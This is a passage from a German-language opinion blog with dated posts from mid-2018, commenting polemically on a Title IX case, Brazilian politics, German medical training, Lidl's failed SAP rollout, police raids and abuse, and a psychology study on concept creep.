Der Effekt war, dass plötzlich die Verfolgung von sowas aus den Händen der Strafverfolgung genommen wurde, für die Regeln wie "fairer Prozess" und "im Zweifel für den Angeklagten" und "dem Angeklagten wird ein Anwalt gestellt, wenn er sich keinen leisten kann" und "man kann Entscheidungen in höheren Instanzen anfechten" gelten, und die Unis alle selber a) Rent-a-Cops für ihre Campus-Security angeheuert haben, und b) irgendwelche intransparenten, alles andere als unabhängigen Gremien an Unis solche Fälle aburteilen. Das Ergebnis ist, allen Schilderungen zufolge, furchtbar. An US-Unis ist es üblich, dass sich Professoren nicht mehr alleine mit einer Studentin in einem Raum aufhalten. Es muss immer mindestens noch ein Zeuge dabei sein, der im Zweifelsfall bezeugen kann, dass die Anschuldigungen falsch waren. Kurz: Eine Arbeitsatmosphäre, die man seinem schlimmsten Feind nicht wünschen würde.
So und diese Title-IX-Geschichte ist jetzt mal von einem männlichen Studenten gegen eine feministische Professorin angewendet worden.
Ich berichte das hier nicht aus Gehässigkeit, sondern weil das eine großartige Lektion für alle ist. Der Professorin sind nämlich diverse Feministen zur Seite gesprungen. Und zwar mit genau den Argumenten, mit denen sonst Kollegen männlichen Angeklagten zur Seite gesprungen sind, wo die Feministen sonst öffentlich Ekelanfälle aufführen. Die erste auf der Liste ist Judith Butler.
Die Argumente sind: Wir kennen die Angeklagte persönlich und wissen, wie sie mit Studenten umgeht. Das ist eine bösartige Kampagne gegen sie.
“We testify to the grace, the keen wit, and the intellectual commitment of Professor Ronell and ask that she be accorded the dignity rightly deserved by someone of her international standing and reputation,” the professors wrote.
Ach SO ist das? Weil sie in einer privilegierten Position ist, soll man sie laufen lassen, ja?
Besonders pikant:
Mr. Reitman, who is now 34 and is a visiting fellow at Harvard, says that Professor Ronell kissed and touched him repeatedly, slept in his bed with him, required him to lie in her bed, held his hand, texted, emailed and called him constantly, and refused to work with him if he did not reciprocate. Mr. Reitman is gay and is now married to a man; Professor Ronell is a lesbian.
Wait, what?! Ein klareres Indiz dafür, dass es hier nicht um Liebe sondern um das Ausüben von Macht ging, kann ich mir gar nicht vorstellen gerade.
Die Professorin findet, das sei alles gar nicht so. He was asking for it!
Hätte er mal nicht so einen kurzen Rock angezogen!1!!
Das ist ja leider konsistent mit dem Bild, den der Feminismus in letzter Zeit abgibt. Es geht nicht um Gleichberechtigung, sondern darum, Frauen statt Männern in Machtpositionen zu hieven, die sie dann natürlich genau so missbrauchen können und werden.
Update: Ein Einsender meint dazu, in Deutschland sei das inzwischen genau so an den Unis, inklusive Professoren-Sprechstunde nur mit offener Tür. Wie gruselig.
Und noch eine Story, die in den größeren Kontext passt: Hier wird ein Streamer mit Scheiße beworfen, weil er nie mit Frauen streamt. Das tut er aber nicht, um Missbrauchsvorwürfen aus dem Wege zu gehen, sondern Gerüchten. Wenn er sich nur einmal im Ton vergreift, meint er, würde das sofort rausgeschnitten und zu einem Meme gemacht werden und ihm sein Leben lang hinterher hängen. In was für eine Gesellschaft haben wir uns hier eigentlich degeneriert!?

Fri Aug 10 2018

[l] Gute Nachrichten: Wer ist bei Firefox eigentlich für Trust and Security zuständig?
Na Marshall Erwin. Und was hat der vorher so gemacht?
I spent roughly the first five years of my career in the CIA’s counterterrorism center. There’s a unique element to the job in the counterterrorism center where I got to support our operational work, helping to find members of al-Qaeda, for example, and understanding the threats that they posed.
Na das passt ja mal wieder wie Arsch auf Eimer! (Danke, Jan)
[l] Ich ärgere mich ja immer darüber, wie Progressive konservative Ideen und Personen einfach per se ablehnen, ohne sich inhaltlich auseinanderzusetzen. Die Konservativen haben ein ähnliches Problem, wenn es um Sozialismus geht. Da kommt dann immer das Argument, das habe noch nie irgendwo funktioniert.
Dieses Argument ist mir so völlig fremd, dass ich mich immer frage, ob ich eine Hirnmutation habe, dass ich der einzige bin, der Fremdschäm-Kopfweh kriegt. Oder liegt das daran, dass ich Ingenieur bin?
Man stelle sich mal vor, den Wright Brothers hätte das jemand gesagt. Wir haben jetzt schon so häufig Fliegen probiert und das hat noch nie funktioniert! Also geht es nicht!1!!
Wie absurd!
Wieso bringt irgendjemand so ein offensichtlich schwachsinniges Argument? Und wieso werden die dann nicht sofort von allen Zuschauern ausgelacht?
Ich habe mir ja selbst die Mission auferlegt, mich aktiv solchem Gedankengut auszusetzen, das mir bis daher fremd war, oder dass ich ohne inhaltliche Auseinandersetzung davor nicht rezipieren wollte. Das waren dann Youtube-Videos von Konservativen wie Jordan Peterson und sogar Ben Shapiro habe ich mal probiert. Den finde ich kaum erträglich, und der bringt obiges "Argument" gegen den Sozialismus auch immer wieder. Und der gilt bei den Konservativen als einer der Intellektuellen!
Wo wir gerade bei Ben Shapiro waren. Der hat kürzlich der neuen Hoffnung der Democrats, Alexandria Ocasio-Cortez, ein Debatten-Angebot gemacht. Er sogar würde $10000 an ihren Wahlkampf spenden, wenn sie kommt und eine Stunde mit ihm debattiert. Und was hat sie gemacht? Nichts. Als dann die Nachfragen von Dritten zu nervig wurden, äußerte sie sich wie hier zu sehen. Sie bezeichnete das Debatten-Angebot als "unsolicited request from men with bad intentions" und verglich es mit Catcalling (wenn Bauarbeiter Frauen hinterherpfeifen).
Tja, soviel zur Hoffnung der Democrats. Ja super. Traut sich nicht, sich einem rechten Talkshow-Intellektuellen auszusetzen. Hmm, vielleicht ist Politik dann nicht die richtige Karriere für die gute Frau, wenn sie Angst vor Argumenten der Gegenseite hat?

Mon Aug 6 2018

[l] Leserbrief zur Lage in Brasilien:
ich will deine zwei Sätze zu Lula und der Korruption so mal nicht unkommentiert lassen. Meine Frau ist Brasilianerin, deshalb krieg ich da vieles aus den brasilianischen Nachrichten und sozialen Netzen mit. Dass Lula momentan wegen Korruption einsitzt ist erst mal korrekt. Ob er rechtmäßig verurteilt wurde, das ist eine Frage, über die Brasilien am Ende in den Bürgerkrieg gehen könnte.
Es fing ja alles damit an, dass Dilma impeacht wurde. Auch wegen Korruption. Die man ihr nach allen Regeln des Rechtstaats nicht nachweisen konnte. Auch bis heute sind aus riesigen beschlagnahmten Aktenbergen keine Hinweise aufgetaucht, dass jemand an Dilma gezahlt hatte. Aber egal, sie ist weg.
Da es mit ihr so gut funktioniert hat, hat man dann bei Lula weitergemacht. Dem versucht man schon seit seiner Zeit als Gewerkschafter etwas anzuhängen, bisher hat es nie funktioniert. In diesem Prozess, in dem er jetzt verurteilt wurde, ging es hauptsächlich um das sogenannte "Triplex". Ein dreistöckiges Apartment, dass Lula angeblich gehören soll, für dass aber nicht er bezahlt hat. Dafür gibt es genau keine Beweise. Es gibt keine Dokumente, in denen Lula als Eigentümer drinsteht, und keine Hinweise darauf, dass er oder seine Familie das Ding jemals bewohnt haben. Dazu kommt noch, dass irgendwann Fotos von dem Triplex aufgetaucht sind, und dass im Wert maximal 10% von dem haben kann, was vor Gericht und in den Medien genannt wurde. Ein kleines, fieses Loch. Garantiert nichts, womit sich ein Präsident hätte bestechen lassen. Aber: egal. Genau wegen diesem Triplex sitzt er jetzt ein. Vom Gericht kam ein Zitat, das meine Frau übersetzt hat mit "Es gibt zwar keine Beweise, aber wir haben ausreichend Überzeugung". Kein Scherz.
Seitdem wird außerdem Lulas Recht auf Berufung mit Füßen getreten, und so einige andere Rechte, die ein Gefangener eigentlich haben sollte. Sogar die internationale Presse spricht inzwischen teilweise von politischer Gefangenschaft. Leider hab ich grade kein Zitat zur Hand.
Trotzdem (oder vielleicht deswegen, wer weiß) liegt Lula in Umfragen für die kommenden Wahlen bei ~40%. Brasilien hat eine ziemlich balkanisierte politische Landschaft mit sehr vielen Parteien aller Größen. 40% ist da für die erste Wahlunde riesig, Teilnahme an der Stichwahl zwischen den zwei meistgewählten Kandidaten wäre ihm sicher.
Wäre das Urteil gegen ihn übrigens endgültig rechtskräftig, dann dürfte er wohl gar nicht als Kandidat aufgestellt werden. Das ist wahrscheinlich der Plan seiner politischen Gegner, der aber noch nicht völlig aufgegangen ist.
Zu seinen politischen Gegnern noch ein wenig Kontext. Wenn Lula nicht kandidieren darf, gibt es vor allem zwei mögliche Ausgänge. Einer wäre ein neuer neolib-Präsident, quasi ein direkter Nachfolger des aktuellen Präsidenten Michel Temer. Der könnte dann den Plan fortsetzten, Brasilien wieder zu einem echten Dritte-Welt-Land zu machen. Nachdem Lula und Dilma das Land echt hochgepäppelt hatten erfolgte unter Temer ein sehr steiler Absturz. Der ginge dann halt weiter.
Das wäre immer noch der bessere Ausgang. Die nächste Möglichkeit hieße nämlich Bolsonaro. Das ist ein Typ aus der Trump-Schule der Politik. Totaler Vollidiot, aber weit-rechts-außen-Populist. Öffentlich im Fernsehen mit Zitaten wie "Herr Kandidat, was würden Sie tun, wenn einer ihrer Söhne eine schwarze Freundin nach Hause brächte." - "Das würden meine Söhne nicht tun, sie sind gut erzogen." Der einzige Unterschied zwischen Trump und Bolsonaro ist, dass Trump jede Art von Militärdienst verweigert hat. Bolsonaro war Mitglied (ich glaube sogar Offizier) der Folterpolizei während Brasiliens Militärdiktatur.
Anderen Kandidaten, vor allem linken Kandidaten, werden praktisch keine Chancen eingeräumt.
Pikantes Detail am Rande: während diese ganzen Dinge abgelaufen sind gab es auch noch mehrere tragische Unfälle. Mindestens ein Kandidat bei der letzen Wahl hatte einen unglücklichen Flugzeugabsturz. Dasselbe gilt für mindestens einen Richter, der am Lava Jato beteiligt war. (Lava Jato = Autowäsche = Codename der großen Anti-Korruptions-Aktion). Klar kann das passieren, aber wie heißt es so schön? Einmal ist Zufall, zweimal ist verdächtig…
Anyway, war jetzt etwas weitschweifig. Ich wollte eigentlich nur sagen, dass Lula wegen Korruption einsitzt ist zwar korrekt, gibt aber die Situation nicht wirklich wieder.
Deine eigene Medienkompetenzübungswarnung gilt natürlich auch hier. Das sind alles Informationen aus (n+1)ter Hand von diversesten Kanälen.

Thu Aug 2 2018

[l] Leserbriefe zum Medizinstudium:
Ich würde dir hier gerne mal eine zusätzliche Übung empfehlen: stell dir mal vor, eine Uni (die tatsächlich vom Staat bezahlt wird) würde verkünden, dass sie ab jetzt die Noten für Frauen anhebt, weil sie festgestellt haben, dass die in diesem Fach) eine höhere Wahrscheinlichkeit haben, ihren Abschluss zu machen, und damit die Ausbildung sinnvoller ist. Und frag dich, wie du das finden würdest.
Da werden einfach aus irgendwelchen Gründen Annahmen über den Werdegang der Leute gemacht, die für einzelne Personen vollkommen irrelevant sind, und die denen ihren Werdegang verbauen.
Noch zu den Ärzten in Deutschland: die gehen nicht nach Skandinavien oder in die Schweiz, weil es in Deutschland zuwenig Stellen gibt und sie keine Jobs finden, sondern weil die Arbeitsbedingungen in deutschen Krankenhäusern so ätzend sind und in anderen Ländern besser.
Und um diese Abwanderung zu kompensieren, muss man in Deutschland mehr ausbilden als man braucht - oder eben aus anderen Ländern einkaufen.
Alternativ müsste man die Arbeitsbedingungen in Krankenhäusern verbessern und dort geht es ja seit Jahren eher in die umgekehrte Richtung (mehr Patienten, weniger Personal).
Und solche Überlegungen gibt es tatsächlich (in Kuba zum Beispiel müssen Ärzte nach ihrem Studium für mindestens drei Jahre oder so in Kuba arbeiten, bevor sie ins Ausland gehen dürfen, wo sie viel, viel mehr Geld verdienen, und so quasi ihr kostenloses Studium zurückzahlen) - dass man in Deutschland eine hervorragende Ausbildung für umsonst bekommt und dann das Land verlässt und in einem Land, wo das Studium viel teurer gewesen wäre, arbeitet und dort mehr Geld verdient.
und noch einer:
Wir bräuchten eigentlich viel mehr Ärzte. Landärzte. Will nur keiner werden.
Mein Hausarzt ist vor 3 Jahren in Rente gegangen ohne einen Nachfolger zu finden. Schon damals haben hier im Flecken nicht mehr alle Ärzte neue Patienten angenommen, weil sie ausgelastet sind. Wir hatten Glück, dass unser Wunscharzt damals noch neue genommen hat. Inzwischen ist der aber wohl auch "dicht".
Zwei weitere Ärzte hier im Flecken dürften auch bald in Rente gehen. Wenn die dann auch keine Nachfolger finden wird es unschön. Denn in den Nachbargemeinden sind die Ärzte auch ausgelastet. Und wir sind soweit ich weiß auf dem Papier noch gut versorgt.
Wo gehen die deutschen Ärzte eigentlich in Norwegen hin, nur in die Städte? Freie Landarztpraxen gibt es in D mehr als genug.
Und ein dritter:
Ich denke, dass deutsche Medizinstudenten, die nach dem Studium nach Skandinavien gehen, kein Thema sind, weil viel mehr deutsche Studenten selbst im Ausland studieren und nach dem Studium zurück nach Deutschland gehen. In erster Linie passiert das in Österreich, aber auch der Osten ist beliebt.
Mal davon abgesehen, dass "ein Riegel vorschieben" tatsächlich schwer ist (Gleichstellung von EU-Bürgern), würde es der Summe an deutschen Medizinern eher schaden. Profitieren würden davon Länder wie Österreich, weil man hier wirklich davon reden kann, dass Österreich Mediziner für Deutschland ausbildet, wenn 30-50% der Studienbewerber aus Deutschland kommen. Und hier in Österreich findet diese Debatte auch seit vielen Jahren statt. 84% aller deutschen Medizinabsolventen verlassen Österreich innerhalb 3 Jahren
Ich hörte, es sei generell für Deutsche eher schwierig, in Österreich Fuß zu fassen. Vielleicht hat das auch damit was zu tun?
Und noch ein Leserbrief, der in die selbe Richtung geht:
der Osteuropäische Steuerzahler zahlt auch für die Ausbildung der Ärzte, die dann nach Deutschland gehen.
Die Deutschen Ärzte gehen in die Schweiz, Skandinavien usw. die Osteuropäer nach Deutschland usw.
In Bulgarien, Rumänien usw. fehlen dann die Ärzte. Dorthin will niemand gehen. Den letzten beissen die Hunde.

Mon Jul 30 2018

[l] Ein neuer Report zu MH370 kommt zum Schluss, dass jemand die Instrumente im Flugzeug manipuliert haben muss, um es vom Kurs abzubringen. Aber sie sagen nicht, wer es gewesen sein soll oder könnte.
Update: Leserbrief:
Die 'Controls' in einem Flugzeug bezeichnen üblicherweise 'Eingabegeräte', also Yoke oder Stick, Schubregler, Trimmräder und auch die Eingaben in den Flicghtplanner/ COmputer/Autopiloten. Und 'manipulate controls' würde ich hier echt nicht mit dem deutschen 'manipuliert' übersetzen. Sonder eher: Es würden Eingaben gemacht, die dann zum nur sehr lückenhaft bekannten Flugprofil geführt haben.
'Intrumente' wären Sachen, die einem was anzeigen (Kompass, künstl. Horizont, usw).
Im Prinzip steht da nach Durchsicht nur drinnen, dass der Flieger höchstwahrscheinlich nicht ausser Kontrolle war, sondern auf Steueraktionen reagiert hat, und dass die momentan vermutete Route auf solche Steuereingaben zurückzuführen ist.

Sun Jul 22 2018

[l] Old and busted: Erdogan-Mitarbeiter verprügelt Demonstranten.
New hotness: Macron-Mitarbeiter verprügelt Demonstranten. Dafür muss er jetzt vor Gericht. Immerhin.
Oh, wo wir gerade bei der Türkei und Frankreich waren… Jetzt wo Erdogan sich zum Diktator auf Lebenszeit gemacht hat, endet in der Türkei der Ausnahmezustand. Nach zwei Jahren. Frankreich hatte den mit einem Terrorgesetz zur Regel gemacht.

Sat Jul 21 2018

[l] Trumps Bagman Michael Cohen hat sich abgesichert. Der hat anscheinend Aufnahmen von Trump gemacht, wenn der dunkelgraue Dinge wie Schweigegeldzahlungen an ein Playboy-Model von ihm wollte. Und das Tape ist bei der FBI-Hausdurchsuchung gefunden worden, wie jetzt Trumps Anwalt Giuliani bestätigt hat.
Am Rande dieser Geschichte gab es das folgende Dementi für die Geschichtsbücher:
Giuliani told the AP: “The transaction that Michael is talking about on the tape never took place, but what’s important is: if it did take place, the president said it has to be done correctly and it has to be done by cheque” to keep a proper record of it.
Da muss ich direkt an den Noddle Incident denken :-D

Fri Jul 20 2018

[l] Kapitalismus ist, wenn … Der Pizzalieferdienst die Schlaglöcher in den Straßen fixt. Die sagen in ihrer Werbung zu, dass sie innerhalb von 30 Minuten liefern oder die Pizza ist kostenlos, und dass die Pizza unbeschädigt ankommt, und beides ging wohl nicht wegen der vielen Schlaglöcher in dieser Kommune in Texas, also haben sie eine Partnerschaft mit der Kommune gemacht und die Löcher zugemacht. (Danke, Alexander)

Mon Jul 16 2018

[l] Lidl versenkt 500 Mio € in eine SAP-Einführung.
Nach sieben Jahren und Kosten von mehr als einer halben Milliarde Euro läuft das geplante System noch immer nicht reibungslos. Jetzt hat der Discounter die Reißleine gezogen.
Sieben Jahre klingt echt viel. Sehr ungewöhnlich auch, dass Firmen in der Lage sind, bei so einem Katastrophenprojekt die Reißleine zu ziehen. Die meisten Manager sind dazu nicht in der Lage, weil sie nicht zugeben können, einen Fehler gemacht zu haben. Da wird dann viele Jahre lang immer mehr Geld hinterhergeworfen. Das kennt man ja auch von Projekten der öffentlichen Hand.
Aber wieso ist das denn jetzt gescheitert? Hier ist ein Hinweis:
Bislang wurde das neue System aber nur in den kleinen Vertretungen in Österreich, Nordirland und den USA eingeführt. Dabei hat sich wohl gezeigt, dass die von über hundert IT-Spezialisten entwickelte SAP-Version für umsatzstarke Länder nicht taugt.
Ich interpretiere das mal als Performance-Probleme. Braucht pro Transaktion zuviel Zeit vielleicht? Oder schafft die Tages- oder Monats-Abrechnung nicht schnell genug?
Von Programmierern hört man in den letzten Jahren immer häufiger, Performance sei ja gar nicht so wichtig. Besonders von Leuten, die dann sedimentäre Abstraktionsentwicklung in Java praktizieren. Das stimmt halt nicht. Ich empfehle immer, harte Performance-Anforderungen in die Abnahmebedingungen zu schreiben. Wenn die gelieferte Software das mit der vorgeschriebenen Hardware nicht in der vorgegebenen Zeit schafft, wird sie nicht abgenommen, und der Softwareentwickler trägt das volle Risiko dafür. Im Moment beobachtet man häufig, dass die Software-Klitschen ihre Inkompetenz einfach an die Auftragnehmer externalisieren, die dann halt mehr Hardware kaufen, weil das billiger ist als sich jahrelang mit irgendwelchen Zulieferern zu streiten. Das Ergebnis sind die üblichen Schnarch-IT-Systeme, die wir alle kennen.
Ich denke mal, dass SAP diese Darstellung nicht auf sich sitzen lassen wird und da auch noch eine Pressemitteilung zu raushauen wird.
Update: Ah, Heise hat noch ein paar Details. Wie üblich in solchen Projekten hat Lidl das nicht alleine zu stemmen versucht, sondern externe Consultants reingeholt. Lidl wollte einige Umstellungen auf sehr grundsätzlicher Ebene. Das ist praktisch immer eine Zeichen dafür, dass das Projekt scheitern wird. Die Idee bei SAP ist nicht, dass du das kaufst und dann an deine Bedürfnisse anpasst. SAP macht in einer Branche das erste Projekt mit dem Marktführer, und alle anderen kaufen das dann und passen sich an SAP an, nicht anders herum. Die Idee ist, dass SAP die Prozesse umgesetzt hat, die beim Marktführer funktionieren. Du kaufst SAP nicht, damit das weiter wie bisher läuft, sondern damit du deine schrottigen Prozesse auf die umstellen kannst, die auch der Marktführer einsetzt. Da war Lidl also entweder schlecht beraten oder sie haben sich über den Tisch ziehen lassen, wenn sie das trotzdem versuchen.
Das andere interessante Detail ist, dass sie SAP Retail auf SAP Hana eingesetzt haben, einer In-Memory-Datenbank. Das ist eine In-Memory-Datenbank. Die Daten passen ins RAM. Entsprechend fette Server hat man da am Start. Ein Einsender schrieb, die hätten mehrere Server mit jeweils 4 TB gehabt, ich habe aber keine Ahnung, woher er diese Zahlen hat. Aber von der Größenordnung klingt das für mich nicht unglaubwürdig. Der Unterschied in Zugriffszeiten zwischen DRAM und Platten liegt bei mehreren Größenordnungen. Selbst bei den schnellsten SSDs ist DRAM immer noch eine Größenordnung schneller. Was ich sagen will: Man muss sich echt aus dem Fenster lehnen, um eine Anwendung so zu verkacken, dass sie gegen eine In-Memory-Datenbank schlecht performt.
Die Beraterfirma ist jetzt natürlich unter Druck, das nicht als ihr Verkacken dastehen zu lassen, kann aber auch nicht die Schuld zu Lidl schieben, wenn sie da jemals nochmal Kohle absaugen wollen. Das Ergebnis dieses Spagats seht ihr hier. Money Quote: „Im Vergleich zu ähnlichen Transformationsinitiativen also sehr kurze Projektphasen“. Mit anderen Worten: Andere verkacken noch schlimmer als wir!1!! Und inhaltlich widersprechen sie im Wesentlichen auch bloß der Behauptung, bei Lidl rausgeflogen zu sein. Nicht der Größenordnung der verbrannten Kohle, nicht dem Zeitrahmen und nicht dem „war zu langsam“. (Danke, Alexander)

Sun Jul 15 2018

[l] So schlimm das ist, dass die deutsche Polizei Juden verprügelt, ist es doch auch eine Gelegenheit, mal die ganzen mafiösen Taktiken und Strukturen in der Polizei aufzuarbeiten, denn endlich glaubt mal jemand lieber dem jüdischen Professor als den Cops. Und die haben bei dem das volle Programm durchgezogen. Angriff ohne Provokation, Missbrauch das Gewaltmonopols, dann erbärmlichstes Herumlügen und sich gegenseitig die Stories stützen, weil die Justiz lieber 5 sich im Kreis entlastenden Bullen glaubt als einem verprügelten Opfer. Und sie haben ihn nicht einfach nur verkloppt, sie haben ihn erst gefesselt und dann verkloppt. Soweit kommt es noch, dass unsere ehrenwerte Polizei ehrenwert kämpft. Man muss sich fast wundern, dass sie dem Professor seine Kippa nicht als Passivbewaffnung ausgelegt haben. Money Quote:
Kurz nachdem ihm die Handschellen wieder abgenommen worden seien, habe ihn einer der Polizisten belehrt: "Don't get in trouble with the German police!" ("Legen Sie sich nicht mit der deutschen Polizei an!"). Darauf habe er geantwortet, dass die deutsche Polizei 1942 seinen Großvater, seine Großmutter, seinen Onkel und seine Tante ermordet habe.
Schöne Tradition, die unser Polizeistaat da nicht in Vergessenheit geraten lassen will!
Wer jetzt noch auf die üblichen Drohungen mit Strafverfolgung durch die Cops wartet, der muss natürlich nicht lange warten:
Am Ende hätten sie ihm deutlich gemacht, dass sie, sollte er sich über sie beschweren, gezwungen wären, ihn zu beschuldigen, sich seiner Festnahme widersetzt zu haben.
In der Kriminalstatistik an dieser Stelle auch immer prominent vertreten: Schwerer Landfriedensbruch. Und wenn sie noch einen Passanten gefunden hätten, wäre das hier sicher zum Einsatz gekommen. Einem Einzelnen kann man schwer Zusammenrottung vorwerfen (dieses Wort steht wirklich in unserem StGB!).
Update: Bonn ist in NRW. NRW verschärft gerade das Polizeigesetz. Falls jemand noch Fragen hatte, ob das eine gute Idee ist oder nicht. NRW ist das Bundesland, wo FDP, CDU und AfD gemeinsam im Schulterschluss Polizeikennzeichnung wieder abgeschafft haben, weil das ja ein Ausdruck von Misstrauen gegenüber der Beamten sei. Nein, wirklich! Ich denk mir das nicht aus hier! Das waren auch die, die die Demo gegen das Polizeigesetz verbieten wollten, weil es die öffentliche Sicherheit gefährde.

Thu Jul 12 2018

[l] War ja klar. Trump feiert jetzt seinen Sieg über die Nato-Länder. Danke, Merkel! Gut gemacht, Merkel! Dem haben wir es aber gezeigt!!1!
m(

Sun Jul 8 2018

[l] Die Uno wollte sich in einer Resolution für Stillen (von Kleinkindern) stark machen. Und das ist ja auch wissenschaftlich untermauert!
Based on decades of research, the resolution says that mother’s milk is healthiest for children and countries should strive to limit the inaccurate or misleading marketing of breast milk substitutes.
Tjahaaa, da haben sie die Rechnung ohne das Land gemacht, in dem die ganzen Turbokapitalisten sitzen, die diese irreführenden und falschen Marketing-Behauptungen zu Milchpulver verbreiten. Die Milchpulverlobby hat Trump gekauft und der spielt jetzt mit harten Bandagen. U.a. haben die USA Ecuador gedroht, wenn sie nicht die Resolution zurückziehen, dass die USA dann Strafzölle verhängt und Militärhilfe streicht. Die Regierung von Ecuador hat direkt eine SPD gepullt.
[l] Es gibt gerade eine Art Reverse Gamergate. Eine Mitarbeiterin von Arenanet (die machen Guildwars, ein MMORPG), hat sich SJW-style von fiesen Misogynisten umzingelt gefühlt und auf Twitter harmlose Passanten als Mansplainer und "random asshat" beschimpft. Daraufhin hat Arenanet sie gefeuert. Und zwar nicht nur sie, sondern auch einen männlichen Kollegen, der ihr zur Seite sprang.
Das ist natürlich genau so Kacke wie irgendwelche Passanten feuern, weil sie auf einer Konferenz einen Fork-Joke über git gemacht haben.
Wer sich jetzt denkt, hey, die gefeuerte Frau wird sich jetzt verhalten wie die Fork-Joke-Leute damals, wird sich öffentlich entschuldigen und Besserung geloben, der sieht sich übrigens getäuscht. Die versteift sich anscheinend sogar noch in ihr Ich-bin-hier-das-Opfer-Narrativ.
Ich finde das sehr schade, dass wir unser gemeinsames Wohnzimmer im Internet so haben verkommen lassen. Der Teppich riecht wie ein Kreuzberger Hinterhof.

Sat Jul 7 2018

[l] Captain Obvious hat mal eine Studie gemacht: Krawatten können die Blutzufuhr zum Gehirn unterbrechen. NEIN!! DOCH!!!! OOOOH!!!!!!!

Fri Jul 6 2018

[l] Mir gehen gerade Gerüchte zu, dass es bei Domainfactory einen Datenreichtum gegeben hat. Es gab da wohl Threads zu auf deren Kundenforen, und die Threads sind dann gelöscht worden. Hier sagt ein Kunde (?) von denen auf Twitter, ein Hacker habe ihm seinen Datensatz von Domainfactory gemailt, inklusive Schufa-Score. Aber wohl ohne Kreditkartendaten oder Kontonummer. Immerhin.
Ich bin da kein Kunde und habe keine Ahnung, was da passiert ist und was nicht. Ich gebe hier nur das Gerücht weiter. Im Zweifel für den Angeklagten.
Update: Heise bestätigt.
Update: Domainfactory gibt den Hack zu.

Wed Jul 4 2018

[l] Die Polizei hat eine fette Razzia bei den Zwiebelfreunden Dresden gemacht, und auch gleich noch die Wohnungen von Vorstandsmitgliedern in Berlin, Dresden, Augsburg und Jena mitgenommen. Dabei haben sie alles beschlagnahmt, was nach Festplatte, Mobiltelefon oder generell Computertechnik aussah.
Warum?
Weil die Zwiebelfreunde Spenden gesammelt haben, die sie dann an Riseup weitergespendet haben. Und bei Riseup tummeln sich halt diese ganzen Linksterroristen, wie die CSU sie nennen würde, die dann so fiese unrechtstaatliche antidemokratische Dinge tun wie gegen einen AfD-Parteitag in Augsburg protestieren zu wollen. Wo kämen wir da hin!
Ja, richtig verstanden: Die Cops wollten ein paar Terroristen mit Riseup-Emails identifizieren von einem Anti-AfD-Protestaufruf. Und dachten sich: Hey, Riseup ist in den USA, da kommen wir nicht ran, also machen wir hier mal einen "wehrhafte Demokratie" Terroranschlag gegen die Zwiebelfreunde. Nicht weil wir glauben, dass die uns helfen können. Nein, kommt, Leute, das kann mir keiner erzählen, dass die Cops SO DÄMLICH sind. Die sind vielleicht nicht immer die Hellsten, aber so unfassbar dämlich sind selbst die Cops in Dresden nicht. Die Staatsanwaltschaft kannte übrigens die Zwiebelfreunde von früherer Zusammenarbeit.
Daher ist für mich sonnenklar: Das war ein vorsätzlicher Terroranschlag der deutschen Behörden gegen unbeteiligte Zivilisten, mit dem Ziel, endlich mal wieder Stärke zu zeigen. Und solange es nur linke Zecken trifft, ist das ja auch nicht schlimm.
Es ist eine Schande für unsere Demokratie, dass für solche Aktionen niemand aus den "Sicherheitsbehörden" in den Knast wandert. Einen klareren Fall von Amtsmissbrauch kann ich mir gar nicht vorstellen.
Sehr geil auch, wie die Cops da noch einen auf "haha wir sind so blöde, haha" machen, indem sie eine 3d-gedruckte "Atombombe", offensichtlich ein Spielzeug, mit der Begründung "Delikt: Herbeiführen einer Sprengstoffexplosion" beschlagnahmen. Hey, warum nicht gleich "Herbeiführen einer Explosion durch Kernenergie" (§307 StGB)?
Heise dazu, Golem dazu, Pressemitteilung des CCC dazu.
Update: Dank des englischsprachigen Blogposts der Zwiebelfreunde hat es die Geschichte in die internationalen Medien geschafft. Herzlichen Glückwunsch, lieber Polizeistaat-Heimathorst! So schnell hat lange kein Innenminister mehr Deutschland international lächerlich gemacht.

Sun Jul 1 2018

[l] Krasse Scheiße des Tages: "Ist dieser Punkt blau?"
Eine Serie von Versuchen hat den Probanden eine Punktwolke gezeigt und sie sollten die blauen Punkte identifizieren. Das ganze 200 Mal mit verschiedenen Punktwolken. Die Ergebnisse blieben vergleichbar.
Dann haben sie das ganze nochmal gemacht, aber sie haben die Anzahl der blauen Punkte in der Wolke runtergefahren. Und siehe da, plötzlich sahen die Probanden auch lila Punkte als blau an.
Das klingt jetzt noch nicht so krass, aber übertragt das Ergebnis mal auf andere Fragestellungen. Die Wissenschaftler haben probiert: "Welche Gesichter sehen bedrohlich aus" und "Is this research poposal ethical?"
Und da tritt der Effekt auch auf.
When blue dots became rare, purple dots began to look blue; when threatening faces became rare, neutral faces began to appear threatening; and when unethical research proposals became rare, ambiguous research proposals began to seem unethical. This happened even when the change in the prevalence of instances was abrupt, even when participants were explicitly told that the prevalence of instances would change, and even when participants were instructed and paid to ignore these changes.
Und DAS, meine Damen und Herren, ist GANZ krasse Scheiße. Dieser Effekt könnte der Grund für die Existenz des Konzepts "Microaggressions" sein!
in 1960, Webster’s dictionary defined “aggression” as “an unprovoked attack or invasion,” but today that concept can include behaviors such as making insufficient eye contact or asking people where they are from. Many other concepts, such as abuse, bullying, mental disorder, trauma, addiction, and prejudice, have expanded of late as well.
Und der wichtige Punkt an der Stelle ist: Es geht nicht darum, ob global der Blauanteil sinkt, sondern in der Teilmenge, die die Testperson persönlich sieht. "Es gibt aber noch echten Rassismus" ist daher kein Entkräftungsargument an dieser Stelle.
Ich persönlich benutze seit Jahren mein eigenes Verhalten zu Spam in einem ähnlichen Kontext als Anekdote. Spam hat mich ein bisschen geärgert aber nicht viel. Dann habe ich Spamfilter installiert. Und jetzt ärgern mich die paar durchkommenden Spams viel mehr als der riesige Haufen vorher. Ich habe mir das immer so erklärt, dass ich subjektiv den Eindruck habe, die hätten böswillig Extra-Schritte unternommen, um meine Spambekämpfung zu umgehen, und daher nehme ich ihnen das persönlich übler. Aber vielleicht war das nur die halbe Story.
Anyway, dieser Effekt kann auch der Grund sein, wieso so viele Menschen glauben, mit der Welt ginge es bergab.
Although modern societies have made extraordinary progress in solving a wide range of social problems, from poverty and illiteracy to violence and infant mortality, the majority of people believe that the world is getting worse. The fact that concepts grow larger when their instances grow smaller may be one source of that pessimism.
Tja, und was machen wir jetzt mit dieser Erkenntnis? Auf Twitter schlug jemand vor, dass Wissenschaftler jetzt Strohhalme ziehen und die Verlierer müssen massiv unethische Forschung einreichen, damit die zuständigen Ethikkommissionen was zum abweisen haben und der Rest durchkommt. (Danke, Jörg)

Wed Jun 27 2018

